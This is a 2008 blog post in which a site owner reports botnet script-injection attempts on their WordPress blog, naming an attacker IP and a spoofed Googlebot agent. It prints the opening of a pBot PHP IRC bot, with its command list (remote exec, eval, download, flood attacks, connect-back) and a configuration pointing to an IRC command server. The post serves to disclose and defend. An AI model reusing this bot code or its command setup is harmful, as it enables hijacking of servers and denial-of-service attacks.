Today’s we just upgrade from WordPress 2.3.2 to 2.3.3 security release. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts ↓. The first attacker is from 212.24.62.200 → udkado.ru masking their useragent as Googlebot (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the attacker data to abuse network and IronPort.

The next few hours we received 20 attack from the same bot-herder. They probably has a large scale of DDNS (china → korea → us ). Noticeably the scans pattern is predictable. From our Feb 5th attack all these botnet is targeting certain search keywords security, injection so we setup a honey-pot right on that particular URL.

Hacking Attempts on Kakkoi

Sort by Injection type.

The Bot-herder Host

Part of class pBot source taken from http://basiclifesaving.org/mycomments/rom.txt

<? 

/*
 *
 * #crew@corp. since 2003
 * edited by: devil__ <admin@xdevil.org>
 *
 * COMMANDS:
 *
 * .user <password> //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail <to> <from> <subject> <msg> //send an email
 * .dns <IP|HOST> //dns lookup
 * .download <URL> <filename> //download a file
 * .exec <cmd> // uses exec() //execute a command
 * .sexec <cmd> // uses shell_exec() //execute a command
 * .cmd <cmd> // uses popen() //execute a command
 * .info //get system information
 * .php <php code> // uses eval() //execute php code
 * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
 * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
 * .raw <cmd> //raw IRC command
 * .rndnick //change nickname
 * .pscan <host> <port> //port scan
 * .safe // test safe_mode (dvl)
 * .inbox <to> // test inbox (dvl)
 * .conback <ip> <port> // conect back (dvl)
 * .uname // return shell's uname using a php function (dvl)
 *
 */

set_time_limit(0);
error_reporting(0);
echo "Ok unlocker. We did i!";

class pBot
{
 var $config = array("server"=>"Bucharest.ro.eu.ultra-chat.org",
 "port"=>"6667",
 "pass"=>"n",
 "prefix"=>"[R]",
 "maxrand"=>"4",
 "chan"=>"#unlocker",
 "chan2"=>"#unlocker",
 "key"=>"n",
 "modes"=>"+p",
 "password"=>"n",
 "trigger"=>".",
 "hostauth"=>"Robert.users.ultra-chat.org" // * for any hostname (remember: /setvhost xdevil.org)
 );

Related Posts

• Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008
• Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan

External Links

• Wikipedia → Botnet
• Storm Botnet
• Dynamic DNS

I received lots of multiple botnet injection (e.g: code & sql) on my wordpress blog. All the failed attempts from these Botnet (Bot-herder) will be published in this post. Somebody might find the informations useful ↓.

Failed Hacking Attempts

Sort by Injection type.

Related Posts

• Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan

External Links

• Wikipedia → Botnet
• Storm Botnet